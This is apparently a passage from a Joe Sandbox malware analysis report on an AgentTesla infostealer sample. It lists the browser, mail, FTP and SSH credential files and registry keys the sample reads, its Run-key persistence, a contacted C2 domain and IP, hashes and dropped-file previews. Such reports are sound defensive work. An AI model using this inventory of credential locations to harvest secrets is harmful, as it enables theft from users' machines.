                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0098091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0098091D
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009AB340 GetUserNameW,0_2_009AB340
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00961E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00961E8E
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0094DDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SOA_9828392091.exeBinary or memory string: WIN_81
                Source: SOA_9828392091.exeBinary or memory string: WIN_XP
                Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: SOA_9828392091.exeBinary or memory string: WIN_XPe
                Source: SOA_9828392091.exeBinary or memory string: WIN_VISTA
                Source: SOA_9828392091.exeBinary or memory string: WIN_7
                Source: SOA_9828392091.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00988C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00988C4F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0098923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0098923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		121
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts3
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol2
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		21
                Obfuscated Files or Information                		1
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		11
                Software Packing                		NTDS138
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		1
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		11
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		11
                Masquerading                		Cached Domain Credentials141
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Hidden Files and Directories                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SOA_9828392091.exe39%ReversingLabsWin32.Trojan.AutoitInject
                SOA_9828392091.exe28%VirustotalBrowse
                SOA_9828392091.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                palumalimited.com4%VirustotalBrowse
                mail.palumalimited.com5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://mail.palumalimited.com0%Avira URL Cloudsafe
                https://wixxOvts0RfcEfM.org0%Avira URL Cloudsafe
                http://palumalimited.com0%Avira URL Cloudsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
                http://dEIFpD.com0%Avira URL Cloudsafe
                http://palumalimited.com4%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                palumalimited.com
                		174.136.29.110
                		truetrueunknown
                mail.palumalimited.com
                		unknown
                		unknowntrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://mail.palumalimited.comRegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://wixxOvts0RfcEfM.orgRegSvcs.exe, 00000002.00000002.4577127670.0000000002F76000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://palumalimited.comRegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmpfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://dEIFpD.comRegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                174.136.29.110
                		palumalimited.comUnited States
                		33494IHNETUStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1562878
                Start date and time:2024-11-26 08:21:24 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SOA_9828392091.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 54
                • Number of non-executed functions: 299
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                02:22:19API Interceptor11187382x Sleep call for process: RegSvcs.exe modified
                08:22:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yGbzOMp C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                08:22:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yGbzOMp C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                174.136.29.110luthor.jsGet hashmaliciousRemcosBrowse
                • leinadenterprises.com/dig/fiscal.jpg
                RMT_ADV_110122-PDF.lnkGet hashmaliciousUnknownBrowse
                • leinadenterprises.com/dig/fiscal.jpg

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                IHNETUSbotnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                • 216.193.245.90
                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                • 69.194.228.59
                na.elfGet hashmaliciousUnknownBrowse
                • 216.193.245.64
                https://punchconsultingcomdocs.blob.core.windows.net/catherinebrien/2EQ40z6JcQ8ZrKYgbMrrRmtVQafHWHTWzkJLTUq2CjCuzBCekR7uHtqnRYRYmEhiJ2e7Y.htmlGet hashmaliciousUnknownBrowse
                • 174.136.38.30
                https://punchconsultingcomdocs.blob.core.windows.net/catherinebrien/2EQ40z6JcQ8ZrKYgbMrrRmtVQafHWHTWzkJLTUq2CjCuzBCekR7uHtqnRYRYmEhiJ2e7Y.htmlGet hashmaliciousUnknownBrowse
                • 174.136.38.30
                xd.x86.elfGet hashmaliciousMiraiBrowse
                • 216.193.245.86
                LisectAVT_2403002C_17.exeGet hashmaliciousAgentTeslaBrowse
                • 174.136.29.143
                0SpHek7Jd8.elfGet hashmaliciousUnknownBrowse
                • 174.136.30.136
                Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                • 216.193.235.105
                rSOAMAR-APR2024-7917089.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 174.136.29.110

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exengPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                  Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                      Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                        Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                          M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                            mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                              1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                  purchase order P857248 dated 04112024.exeGet hashmaliciousXWormBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yGbzOMp.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):142
                                    Entropy (8bit):5.090621108356562
                                    Encrypted:false
                                    SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                    MD5:8C0458BB9EA02D50565175E38D577E35
                                    SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                    SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                    SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                    C:\Users\user\AppData\Local\Temp\aut87C6.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\SOA_9828392091.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):167428
                                    Entropy (8bit):7.878951939288892
                                    Encrypted:false
                                    SSDEEP:3072:fV0VbpAkqg3KPHj1RqiCW/00C9uL9MydkJh5gTi7LpUj:fVbBRqiCWrC9uL9MyahxhUj
                                    MD5:334386F3A59D173402CE42B9E667AD55
                                    SHA1:76D5CAAE31597857864E3E641DFC3CAAEFB891D5
                                    SHA-256:043A82957B45C120FF11CBCA4F75836B25A5FA14BB648BF297BE4FD23B5250BF
                                    SHA-512:14107798765CB6029D4A55EA3E584482CB5118B2E29B7633478714A24CFE9FC82A29D3331B528754D67233FE94B8679993767FB46DCF79D3AF8B746883F7E837
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..h..@..je&.P..f...R..&.i.".6..).jx..Y..)4.mJf.1....y ...W..N?...[.M.`.......N....J....d........s...Z.C`..z.S.....L.#0.....S.Yo..J...}&.Q.N'..LF.R....1Y.S...H....).P.`.Q&.0...@*5....@..6....g2Ju&.........+.....&.kX..........O.P.B? ...34.P@.;?.S(.p...h.).0.`...63g..4.....I.L...<.T.`X. ..".6....M<...R(.h.S*.J........8&......Q.Bi...G......+...:.Pf.~.:....*.....O...<?....f..<.N.JkVJ.>.F...S*u&....9...D.m.T.5.uD.Vf{Jm&.I...zf...\..j..P..$..}6.%..+..}O.6.S..JM....F)..%6.+.M.S...;.Sh..l..Y.....>......y.N.]..z..VmV.S.TNl.7D....~..j.....mN...U...{l..(.h.....Pi.(.V.H.k&Q..zgH..95....B.U.<y...d..z..%..+.M..k`.F..... ....Tj:.PO@*?y.....V#ri..eb.M...u....W.3J.~.f...r....F.O+....`.S.SJMGcL.Lc.[on.l..Tz..Q..)4j}..D...l....T....&.G.H .Z5..@.V).z...k..{.E..J.M&..5&.<........@..*....96.N,v.`...`........CS..)U.n.L..H..Y..W.TivJ8.F........Z}:..PN.. ...3.0,.ix.._.`+....b..S9.......@B3..U......y....=@.......zSX.S,...*.2.E....i7..t.u....V)4...An..oQ0-..>.E@.(O.!....c

                                    C:\Users\user\AppData\Local\Temp\schoolma

                                    Download File
                                    Process:C:\Users\user\Desktop\SOA_9828392091.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):223232
                                    Entropy (8bit):7.079772904916712
                                    Encrypted:false
                                    SSDEEP:6144:Hdmv5tLvaXAkmQUmMXP0dLQozTwRa281Q0KG2PTpVZZFp:HQfGAUUGdcsTgDFrL
                                    MD5:8153E3C9EF43698B1653DB36BA9A8EC3
                                    SHA1:EAABE0443F156DA7ECF58C18AE97FF1C9AB6AD4C
                                    SHA-256:C23D73DE7CE2D60890D032E1BEADE55EDED9D11FA0A45552A60FABCCF5EA08C8
                                    SHA-512:1392155FFF9B6BE2E4F9A7B56C4E909DCBA09ABC70146E7BCEFF3350FB47BC58F50936AAA4613101F6033AAEE269133D0C42D2D82634DFE7963C8CA0D8120BE8
                                    Malicious:false
                                    Reputation:low
                                    Preview:z..FLILP]94N..MR.47F8HD6wXLFOILPY94NIOMR347F8HD67XLFOILPY94N.OMR=+.H8.M...M..h.80J.>; * RY.%Y&*YCx.#o;9>yPZn...r^[S#.EI<.XLFOILP.|4N.NNR..G%8HD67XLF.INQR8?NI.NR3<7F8HD6Y$OFOiLPY94NIO.R3.7F8JD63XLFOILP]94NIOMR3.4F8JD67XLFMI..Y9$NI_MR34'F8XD67XLF_ILPY94NIOMR+H4FkHD67.OF.LLPY94NIOMR347F8HD67.OFCILPY94NIOMR347F8HD67XLFOILPY94NIOMR347F8HD67XLFOILPY.4NAOMR347F8HD6?xLF.ILPY94NIOMR.@R>LHD6C.OFOiLPYg7NIMMR347F8HD67XLFoIL0wKG<*OMRc17F8.G67^LFO)OPY94NIOMR347FxHDv.*)* *LPU94NI.NR367F8.G67XLFOILPY94N.OM.347F8HD67XLFOILP.E7NIOMR{47F:HA6..NF..LPZ94NXOMT347F8HD67XLFOILPY94NIOMR347F8HD67XLFOILPY94NIOMR-6.G8HN.)ZdBOIFz.J2NIE.S3435?HD<.ZLFK:DPY3.MIOI!:47L.LD63rLF\yNPu94NHOMC%?.]8OS.6tN^DIKF.8.L^DMU+.6j:cF..&MFOM#ZY9>dZ.OR.47F:HD'!Sg]ON[.X.6VBOJD.5.D/CD1/.MjMbN{.G6NIK"Y34=l+xF6.XLFLILAO2.UIHZ.2.5^3HC .Y`DXBLWA.5bKdOy.J4F8L+:7XFl\yNPu94NMOMC%?.]8OS.6tN^DIKF.8.L^DMU+.6j:cF..&HFOM#]Y9>dZ.OR.47F=HD'!Sg]ON[.X.6VBOJD.5.D/CD1/.MjMbN{.;7fXOMX.&7F2bD6$hNFgILP_94__DfI33 .9dF.<XKP.H`RN24IQ.L~1.5m.Jl%7XFl\yNPu94NNOMC

                                    C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:modified
                                    Size (bytes):45984
                                    Entropy (8bit):6.16795797263964
                                    Encrypted:false
                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                    • Filename: Pi648je050.exe, Detection: malicious, Browse
                                    • Filename: shipping documents.exe, Detection: malicious, Browse
                                    • Filename: Termination_List_November_2024_pdf.exe, Detection: malicious, Browse
                                    • Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious, Browse
                                    • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                    • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                    • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                    • Filename: copto de pago.exe, Detection: malicious, Browse
                                    • Filename: purchase order P857248 dated 04112024.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1141
                                    Entropy (8bit):4.442398121585593
                                    Encrypted:false
                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                    Malicious:false
